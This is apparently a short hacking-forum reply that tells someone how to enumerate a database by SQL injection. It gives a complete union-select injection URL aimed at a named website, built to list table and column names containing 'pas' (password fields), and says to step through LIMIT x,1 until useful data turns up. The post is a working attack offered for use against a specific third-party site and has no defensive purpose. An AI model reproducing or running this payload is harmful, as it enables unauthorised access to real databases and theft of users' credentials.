hi BRO
use the exress of "LIMIT x,y"to pull data from data base like this :
[html]https://www.kisantech.com/index.php?cat_id=-4 union select concat(table_name,0x3a,column_name,0x3a,table_sche ma),2,3,4,5,6,7,8,9,10+from+information_schema.col umns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37) LIMIT x,1--[/html]
and change the param "x" from 1 to2.....like this
until
u got some error nd got some intersting info from datbase